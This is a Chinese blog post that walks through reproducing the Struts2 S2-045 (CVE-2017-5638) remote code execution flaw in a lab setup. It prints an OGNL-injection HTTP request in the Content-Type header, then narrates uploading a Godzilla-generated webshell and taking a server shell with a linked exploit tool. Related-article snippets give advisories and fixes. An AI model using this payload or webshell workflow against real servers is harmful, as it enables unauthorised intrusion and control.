struts2-045 远程代码执行漏洞(CVE-2017-5638)

已于 2023-09-16 22:21:07 修改
阅读量793 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全 服务器
于 2023-06-02 11:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/131002631
版权

目录

S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境

S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境

 进入Ubuntu系统下的对应漏洞环境,开启环境

443c8b97fcc37ce64e8b1069023097a7.png

 将漏洞环境开启来

d3a0e5616b3128e6f6ecdf5bfcb88371.png

查看是否启动成功

2cec38063d847f84754bcd68b87f2c7c.png

 启动成功过后,去浏览器进行访问:
通过浏览器去访问该漏洞环境
 http://ip:8080

335074169bbf20760e2c19d8915e5dce.png

 接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化

随便上传一个文件

46bb7cf065b95e050a53ab97cf375e20.png

抓取数据包:

抓取数据包,修改数据包,查看修改后,收到的响应数据
 ​
 直接发送以下数据包
 POST / HTTP/1.1
 Host: localhost:8080
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.8,es;q=0.6
 Connection: close
 Content-Length: 0
 Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data
 ​
 发现123+123已经被执行,显示出结果

抓包

fa412675daa1d6e4ae9c16592007eb26.png

发给重发器过后:

 修改数据包信息,查看响应

7fdda7874260d55712e615656257d861.png

 观察发现我们输入的123+123,已经被执行

 解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell
 工具:哥斯拉、struts2漏洞检测工具

打开哥斯拉,生成木马:

ab53582cab5a79b49373da384a7a1bb3.png

 查看木马文件

2803267960a1f99cac7624e956148b75.png

 将随意的文件尝试上传,观察url变化

f5ea321e07127f9fca51bb59e9df21ba.png

 上传后,观察此url

432de02917b92dd29090f6f14a337e41.png

 
复制此url,借助第三方工具进行扫描
 工具:struts2漏洞扫描工具

27e8ee4b8b54263b9dd87dc8c7c25ce7.png

 查看检查结果,存在漏洞

eb8619af20892b5178d646073d3f06c1.png

 验证漏洞

fda3214a244a6d0d29c8515ca5020a4a.png

 远程命令执行

c957674c6f0df27049072a396190eb68.png

 查看根目录下的内容

6acf5d16f4d1df8964af1cf5bca0fc61.png

 点击文件上传模块,尝试上传木马文件

a0875707e81f29f95c783124283611e0.png

 查看是否能够上传成功,观察到已经上传成功

ea682d3fac9af91666d566f73535a968.png

strut2漏洞检测以及利用工具地址:

https://github.com/shack2/Struts2VulsTools/releases/tag/2.3.20190927

 观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接

3e4a89c124e3524e31d9155f800da547.png

 通过哥斯拉来进行连接

fee7fc88f5a52f45e784cff3719f9e18.png

 连接成功,进行添加,进入,成功拿到服务器shell

c93cd155b5952423d89c08b4da52000b.png

 成功添加

6edb7db638e8da158d04fbab88e36ff1.png

 点击进入即可,成功拿到shell

94231fc5228390f31e80febe3448fb61.png

可对文件进行任何操作:

67c5ce8ef9ca360fbdcaf169f5e5fa67.png

文章不妥之处,欢迎批评指正! 

rumilc
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。 目前Struts2官方已经确认漏洞漏洞编号S2-045CVE编号:cve-2017-5638),并定级为高风险。 CVE: 英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。 受影响的软件版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, 该漏洞危害程度极高,黑客可以利用该漏洞通过浏览器在远程服务器执行任意系统命令, 将会对受影响站点造成严重影响,引发数据泄露、网页篡改、后门植入、沦为肉鸡等安全事件。
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 该漏洞危害极其严重,如发现漏洞请及时修复。 详细了解及复现可查看我的文章 [ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
struts2-core-2.3.31.jar
10-09
  一、漏洞简介     Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品:Struts 1和Struts 2。     Apache Struts 2.3.5 - 2.3.31版本及2.5 - 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-15 2,CVE-2017-5638)。该漏洞与Apache Struts2 (S2-045远程代码执行漏洞原理基本相同,均是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器执行任意命令。      二、漏洞危害     攻击者可通过发送恶意构造的HTTP数据包利用该漏洞,在受影响服务器执行系统命令,进一步可完全控制该服务器,造成拒绝服务、数据泄露、网站造篡改等影响。由于该漏洞利用无需任何前置条件(如开启dmi,debug等功能)以及启用任何插件,因此漏洞危害较为严重。     三、修复措施     目前,Apache官方已针对该漏洞发布安全公告,并且漏洞利用代码已被公布在互联网上,请受影响用户及时检查是否受该漏洞影响。另外,已通过升级方式修复了Apache Struts2 (S2-045远程代码执行漏洞的用户,不在该漏洞影响的范围内。     【自查方式】     用户可查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar文件,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞。     【升级修复】     受影响用户可升级版本至Apache Struts 2.3.32 或 Apache Struts 2.5.10.1以消除漏洞影响。     官方公告: https://cwiki.apache.org/confluence/display/WW/S2-046 https://cwiki.apache.org/confluence/display/WW/S2-046
CVE-2017-5638——S2-045
weixin_30808693的博客
07-20 189
一、漏洞简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品:Struts 1和Struts 2。 ApacheStruts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152,CVE-2017...
漏洞利用(CVE-2017-5638
weixin_46663807的博客
06-14 1835
漏洞利用 **实验准备:**一台Kali主机(攻击机),一台ubuntu主机(靶机),Ubuntu中包含docker,并包含vulhub/struts2:2.3镜像 1、开启Ubuntu,将容器8080映射8888端口 docker run -it -d -p 8888:8080 vulhub/struts2:2.3.30 2、扫描主机,查看是否存在漏洞 在docker中开启Nessus, ...
s2-045漏洞检测工具
01-11
s2-045漏洞检测工具
S2-045 远程代码执行漏洞CVE-2017-5638
Stephen Wolf
11-04 8049
一、S2-045 远程代码执行漏洞CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 6932
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
Struts2 s2-045
2301_76467680的博客
07-01 377
3.构造poc,使用抓包工具Burpsuite,修改数据包插入poc。把上面的代码粘贴到content-type字段发送显示。同样粘贴到content-type字段。
CVE-2017-5638漏洞利用
wuxinweii的博客
06-04 3999
实验准备 :一台Kali主机,一台ubuntu主机,docker中vulhub/struts2:2.3镜像 1、打开docker,开启vulhub/struts2:2.3镜像 dockers run -d -p 8080:8080 vulhub/struts2:2.3 启动镜像容器,映射本地的8080端口。 2.查看能否访问端口 3.扫描主机,查看是否存在CVE-2017-5638漏洞 可以选择nessus扫描主机来确定是否存在该漏洞,这里已经确定存在CVE-2017-5638漏洞,就省略了此步骤,有需
s2-045漏洞补丁struts-2.3.32最新免费版
07-29
目前Struts2官方已经确认漏洞(漏洞编号S2-045CVE编号:cve-2017-5638),并定级为高危风险。 这里提供了s2-045漏洞补丁 struts-2.3.32,大家可以试试! 该漏洞影响范围极广,影响国内外绝大多数使用Struts2开发...
S2-046 远程代码执行漏洞CVE-2017-5638
EC_Carrot的博客
08-12 639
漏洞简介 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-046/README.zh-cn.md 漏洞复现 与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断,改了下vulhub文章的脚本: import socket q = b'''------WebKitFormBo
[春秋云镜自动化打靶]-Struts2-045远程代码执行漏洞复现CVE-2017-5638
afei001
12-07 690
[春秋云镜自动化打靶]-Struts2-045远程代码执行漏洞复现CVE-2017-5638
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)复现
qq_40640917的博客
02-23 2096
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码
weblogic 安全漏洞 CVE-2017-5638
weixin_30727835的博客
08-16 1231
   关于安全漏洞 CVE-2017-5638Weblogic Server 防护建议 关于Weblogic Server如何防护防止近期爆出的Struts 2远程代码执行安全漏洞,为您提供以下内容参考。 Oracle WebLogic Server 产品本身没有使用Struts 2, 因此不受此漏洞影响。 只有Oracle WebLogic Server -sample...
使用 ModSecurity 虚拟修补 Apache Struts CVE-2017-5638
allway2的博客
08-09 356
作为升级到新版 Struts 的一部分,每个依赖于 Struts 的应用程序都需要重新构建并使用最新的 Struts 库进行测试。通过这样做,您可以保护您的网站免受攻击。当快速部署修复库中的代码不切实际时,您可以使用 ModSecurity 拦截漏洞,“虚拟修补”受影响的代码,直到您可以升级受影响的库。有了 ModSecurity 自定义规则,您就可以按照合理的时间表仔细地修补生产软件,而不会受到易受攻击的压力。当打印未转义的无效标头时,将评估 OGNL 表达式,并执行 OGNL 表达式中的任何系统命令。.
逻辑漏洞:水平越权、垂直越权靶场练习
最新发布
qq_68163788的博客
05-02 929
水平越权和垂直越权是组织中常见的管理问题,指的是员工在组织中所拥有的权力和责任超出其职位所应具备的范围。 水平越权是指员工在同一级别的职位上超越了其同事的权力和责任范围,通常表现为某个员工在团队中承担了过多的任务或权力,导致其他同事感到不公平或不满。 垂直越权则是指员工在组织中超越了其职位等级的权力和责任范围,通常表现为员工在没有得到上级批准的情况下做出决策或行动,可能会导致组织内部的混乱和冲突。
strtus2命令执行漏洞s2-045修复
09-01
Struts2命令执行漏洞s2-045是指Struts2框架中的一个安全漏洞,攻击者可以通过特殊构造的参数来执行任意命令。 修复Struts2命令执行漏洞s2-045需要采取以下步骤: 1. 升级Struts2版本:首先需要升级到Struts2最新版本,因为漏洞是在旧版本中存在的。最新版本通常会修复已知的安全漏洞,并提供其他改进。 2. 配置安全策略:在Struts2的配置文件中,可以添加一些安全策略来防止命令执行漏洞的利用。可以禁用某些敏感的操作或限制特定的请求访问权限。 3. 过滤用户输入:对于用户输入的数据,应该进行有效的过滤和验证。可以使用正则表达式或特定的字符过滤函数来检查输入的合法性,避免注入恶意代码。 4. 校验URL:URL中的参数也需要进行校验和过滤,以防止攻击者通过URL参数来执行恶意代码。 5. 防火墙和Web应用程序防护:在服务器上配置防火墙和Web应用程序防护系统,可以增加额外的安全层。这些系统可以检测和阻止恶意的URL请求,减少被攻击的风险。 6. 定期更新和审查:持续关注Struts2安全公告和更新,及时升级修复已知的安全漏洞。同时,定期审查应用程序的安全配置和代码,发现并修复可能存在的漏洞。 通过以上措施,可以有效修复Struts2命令执行漏洞s2-045,提高应用程序的安全性,防止被攻击和利用。同时,建议开发人员和管理员密切关注最新的安全漏洞信息,及时采取相应的措施进行修复和防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值